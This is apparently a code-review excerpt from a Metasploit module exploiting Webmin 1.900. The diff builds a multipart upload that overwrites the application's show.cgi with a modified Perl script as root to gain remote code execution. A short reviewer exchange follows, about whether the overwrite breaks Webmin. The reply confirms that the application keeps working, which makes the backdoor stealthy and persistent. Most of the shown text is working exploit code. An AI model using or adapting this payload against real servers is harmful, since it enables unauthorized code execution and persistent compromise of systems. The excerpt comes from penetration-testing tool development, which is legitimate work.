modules/exploits/unix/webapp/webmin_1900_rce.rb

```diff
@@ -0,0 +1,296 @@
+    data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-type: $type\\n\\n\";\n\t"
+    data2 << "open(FILE, $temp);\n\tunlink($temp);\n\twhile(read(FILE, $buf, 1024)) {\n\t\tprint $buf;\n\t\t}\n\t"
+    data2 << "close(FILE);\n\t}\nelse {\n\tif (!open(FILE, $p)) {\n\t\t# Unix permissions prevent access\n\t\t"
+    data2 << "&error_exit(&text('view_eopen', $p, $!));\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t"
+    data2 << "# Don't actually do anything if in test mode\n\t\tclose(FILE);\n\t\t"
+    data2 << "&ok_exit();\n\t\t}\n\n\t@st = stat($p);\n\tprint \"X-no-links: 1\\n\";\n\t"
+    data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-Disposition: Attachment\\n\" if ($download);\n\t"
+    data2 << "print \"Content-type: $type\\n\\n\";\n\tif ($type =~ /^text\\/html/i && !$in{'edit'}) {\n\t\t"
+    data2 << "while(read(FILE, $buf, 1024)) {\n\t\t\t$data .= $buf;\n\t\t\t}\n\t\tprint &filter_javascript($data);\n\t\t"
+    data2 << "}\n\telse {\n\t\twhile(read(FILE, $buf, 1024)) {\n\t\t\tprint $buf;\n\t\t\t}\n\t\t}\n\tclose(FILE);\n\t}\n\n"
+    data2 << "sub error_exit\n{\nprint \"Content-type: text/plain\\n\";\n"
+    data2 << "print \"Content-length: \",length($_[0]),\"\\n\\n\";\nprint $_[0];\nexit;\n}\n\n"
+    data2 << "sub ok_exit\n{\nprint \"Content-type: text/plain\\n\\n\";\nprint \"\\n\";\nexit;\n}"
+    data2 << "\r\n\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n#{dir}\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"user\"\r\n\r\nroot\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"group_def\"\r\n\r\n1\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"group\"\r\n\r\n\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"zip\"\r\n\r\n0\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"email_def\"\r\n\r\n1\r\n"
+    data2 << "-----------------------------{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"ok\"\r\n\r\nUpload\r\n"
+    data2 << "-----------------------------{boundary}--\r\n"
+
+    res2 = send_request_raw(
+      'method' => "POST",
+      'uri' => "/updown/upload.cgi?id=154739243511",
+      'data' => data2,
+      'headers' =>
+        {
+          'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
+          'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{session}"
+    )
+
+    if res2 && res2.code == 200 && res2.body =~ /Saving file/
+      print_good "Vulnerable show.cgi file was successfully uploaded."
```

Comment:
Is this description accurate? (I haven't read the advisory).

Is `show.cgi` overwritten? It looks like `show.cgi` is required for exploitation.

What happens if `show.cgi` is overwritten - would that break the application? would it prevent re-exploitation?

If so, then `ExcellentRanking` is not an appropriate rank.

Reply:
The 'show.cgi' is overwritten a modified version of itself which allows RCE - the application remains entirely functional.